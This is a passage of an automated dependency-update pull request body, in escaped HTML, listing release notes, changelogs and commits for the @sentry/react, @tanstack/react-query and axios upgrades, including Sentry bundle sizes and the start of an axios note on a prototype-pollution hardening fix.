href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20821\"\u003e#20821\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eBundle size 📦\u003c/h2\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003ePath\u003c/th\u003e\n\u003cth\u003eSize\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e26.22 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e - with treeshaking flags\u003c/td\u003e\n\u003ctd\u003e24.69 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e43.69 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing + Span Streaming)\u003c/td\u003e\n\u003ctd\u003e45.62 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Profiling)\u003c/td\u003e\n\u003ctd\u003e48.56 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay)\u003c/td\u003e\n\u003ctd\u003e82.4 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay) - with treeshaking flags\u003c/td\u003e\n\u003ctd\u003e72.08 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay with Canvas)\u003c/td\u003e\n\u003ctd\u003e86.99 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay, Feedback)\u003c/td\u003e\n\u003ctd\u003e99.33 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Feedback)\u003c/td\u003e\n\u003ctd\u003e43 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. sendFeedback)\u003c/td\u003e\n\u003ctd\u003e30.92 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. FeedbackAsync)\u003c/td\u003e\n\u003ctd\u003e35.91 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Metrics)\u003c/td\u003e\n\u003ctd\u003e27.27 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Logs)\u003c/td\u003e\n\u003ctd\u003e27.42 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Metrics \u0026amp; Logs)\u003c/td\u003e\n\u003ctd\u003e28.08 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/react\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e27.92 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/react\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e45.9 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/vue\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e31.01 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/vue\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e45.5 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/svelte\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e26.24 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle\u003c/td\u003e\n\u003ctd\u003e28.55 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e46.04 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e29.89 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e47.14 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Replay, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e68.3 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay)\u003c/td\u003e\n\u003ctd\u003e82.55 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e83.6 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Feedback)\u003c/td\u003e\n\u003ctd\u003e88.23 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Feedback, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e89.3 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle - uncompressed\u003c/td\u003e\n\u003ctd\u003e83.97 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing) - uncompressed\u003c/td\u003e\n\u003ctd\u003e138.12 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e88.07 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e141.5 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Replay, Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e209.97 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-javascript/blob/develop/CHANGELOG.md\"\u003e@​sentry/react's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.53.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/test-applications/nextjs-15-intl (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20821\"\u003e#20821\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e10.53.0\u003c/h2\u003e\n\u003ch3\u003eImportant Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003efeat(core): Add \u003ccode\u003estreamGenAiSpans\u003c/code\u003e options to stream gen_ai spans (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20785\"\u003e#20785\u003c/a\u003e)\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eAdds a new \u003ccode\u003estreamGenAiSpans\u003c/code\u003e option that controls how \u003ccode\u003egen_ai\u003c/code\u003e spans are\nsent to Sentry. When set, the SDK extracts all \u003ccode\u003egen_ai\u003c/code\u003e spans out of a\ntransaction and sends them as v2 envelope items.\u003c/p\u003e\n\u003cp\u003eEnable this option if gen_ai spans are being dropped because the transaction payload exceeds size limits.\u003c/p\u003e\n\u003cpre lang=\"ts\"\u003e\u003ccode\u003eSentry.init({\n  dsn: 'https://examplePublicKey@o0.ingest.sentry.io/0',\n  streamGenAiSpans: true,\n});\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat(browser): Migrate browser profiling thread data to span attributes (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20800\"\u003e#20800\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): Add \u003ccode\u003eaddConsoleInstrumentationFilter\u003c/code\u003e utility (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20790\"\u003e#20790\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): Add \u003ccode\u003eapplicationKey\u003c/code\u003e to \u003ccode\u003eBuildTimeOptionsBase\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20789\"\u003e#20789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): split exports by browser/server for bundle size (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20435\"\u003e#20435\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(nextjs): Add top-level \u003ccode\u003eapplicationKey\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20794\"\u003e#20794\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(node): Support Node 26 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20710\"\u003e#20710\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(profiling-node): Bump \u003ccode\u003e@sentry-internal/node-cpu-profiler\u003c/code\u003e to 2.4.0 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20720\"\u003e#20720\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(cloudflare): avoid flush lock self-wait (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20719\"\u003e#20719\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(hono): Capture transaction name on request for correct culprit (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20801\"\u003e#20801\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(mcp): retroactively wrap handlers registered before wrapMcpServerWithSentry (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20699\"\u003e#20699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(node-core): Guard against undefined util.getSystemErrorMap (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20660\"\u003e#20660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(replay): Capture aborted/errored fetch requests in replay network tab (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20722\"\u003e#20722\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/cd9740818cba748dbced0e8a1497000a88ec8a56\"\u003e\u003ccode\u003ecd97408\u003c/code\u003e\u003c/a\u003e release: 10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/66cfb25117ed7b14ca3da20a79b836619e9c8a6c\"\u003e\u003ccode\u003e66cfb25\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20838\"\u003e#20838\u003c/a\u003e from getsentry/prepare-release/10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/df8fd3863043f143961a5d96e79a717d62eada31\"\u003e\u003ccode\u003edf8fd38\u003c/code\u003e\u003c/a\u003e meta(changelog): Update changelog for 10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/588100986580e0f5c8c3204661e59e5103e7d269\"\u003e\u003ccode\u003e5881009\u003c/code\u003e\u003c/a\u003e fix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/6a7d179ad38c7591021c88e4bd3ec82b3c6cc606\"\u003e\u003ccode\u003e6a7d179\u003c/code\u003e\u003c/a\u003e fix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/ad47c3c3de5b2bacfbbd08bcdf9cd90184ce64bc\"\u003e\u003ccode\u003ead47c3c\u003c/code\u003e\u003c/a\u003e ref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/28d6fe514d5ed00561a8e3d1c0406a8cb544c738\"\u003e\u003ccode\u003e28d6fe5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20826\"\u003e#20826\u003c/a\u003e from getsentry/master\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/46aca45a868d717939448ded1001fac4337ac46e\"\u003e\u003ccode\u003e46aca45\u003c/code\u003e\u003c/a\u003e Merge branch 'release/10.53.0'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/b5cbc9ca1800e1b4ee1de66e135a90891cecd570\"\u003e\u003ccode\u003eb5cbc9c\u003c/code\u003e\u003c/a\u003e chore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/tes...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/05489b83e7920fc4ce47a530054c5558c1704a45\"\u003e\u003ccode\u003e05489b8\u003c/code\u003e\u003c/a\u003e release: 10.53.0\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/getsentry/sentry-javascript/compare/10.51.0...10.53.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@tanstack/react-query` from 5.100.9 to 5.100.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TanStack/query/releases\"\u003e@​tanstack/react-query's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-devtools\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-devtools\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-next-experimental\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-persist-client\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-persist-client-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/TanStack/query/commit/d423168f6261a5cb3d353e53b27c8150cc271151\"\u003e\u003ccode\u003ed423168\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-devtools\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-devtools\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-next-experimental\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-persist-client\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-persist-client-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TanStack/query/blob/main/packages/react-query/CHANGELOG.md\"\u003e@​tanstack/react-query's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.100.13\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/TanStack/query/commit/d423168f6261a5cb3d353e53b27c8150cc271151\"\u003e\u003ccode\u003ed423168\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.100.12\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.100.11\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.11\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.100.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.10\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/05cf2bc0a4eae64959dc8a40152e2878190c971b\"\u003e\u003ccode\u003e05cf2bc\u003c/code\u003e\u003c/a\u003e ci: Version Packages (\u003ca href=\"https://github.com/TanStack/query/tree/HEAD/packages/react-query/issues/10758\"\u003e#10758\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/d423168f6261a5cb3d353e53b27c8150cc271151\"\u003e\u003ccode\u003ed423168\u003c/code\u003e\u003c/a\u003e fix(query-core): use built-in NoInfer for generic indexed-access types (\u003ca href=\"https://github.com/TanStack/query/tree/HEAD/packages/react-query/issues/10593\"\u003e#10593\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/5ff4f6936bb66a64267eb4413430f956eecf7248\"\u003e\u003ccode\u003e5ff4f69\u003c/code\u003e\u003c/a\u003e ci: Version Packages (\u003ca href=\"https://github.com/TanStack/query/tree/HEAD/packages/react-query/issues/10755\"\u003e#10755\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/3e85350749751eef055fffb65f6838dfafa74891\"\u003e\u003ccode\u003e3e85350\u003c/code\u003e\u003c/a\u003e ci: Version Packages (\u003ca href=\"https://github.com/TanStack/query/tree/HEAD/packages/react-query/issues/10706\"\u003e#10706\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/9d2692cec4d538c2f96489027ba546f11638dfb1\"\u003e\u003ccode\u003e9d2692c\u003c/code\u003e\u003c/a\u003e ci: Version Packages (\u003ca href=\"https://github.com/TanStack/query/tree/HEAD/packages/react-query/issues/10695\"\u003e#10695\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/74fa05eb1b16f40ea7068afd0e5e082687d22338\"\u003e\u003ccode\u003e74fa05e\u003c/code\u003e\u003c/a\u003e chore(tsconfig.json): narrow 'include' pattern to prevent TS6053 race conditi...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/TanStack/query/commits/@tanstack/react-query@5.100.13/packages/react-query\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `axios` from 1.15.2 to 1.16.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.16.1 — May 13, 2026\u003c/h2\u003e\n\u003cp\u003eThis release ships a defence-in-depth fix for prototype pollution in \u003ccode\u003eformDataToJSON\u003c/code\u003e, hardens proxy and CI workflows, restores Webpack 4 compatibility for the fetch adapter, and includes several small bug fixes and maintenance improvements.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Defence-in-Depth:\u003c/strong\u003e Hardened \u003ccode\u003eformDataToJSON\u003c/code\u003e against already-polluted \u003ccode\u003eObject.prototype\u003c/code\u003e by walking own properties only, so 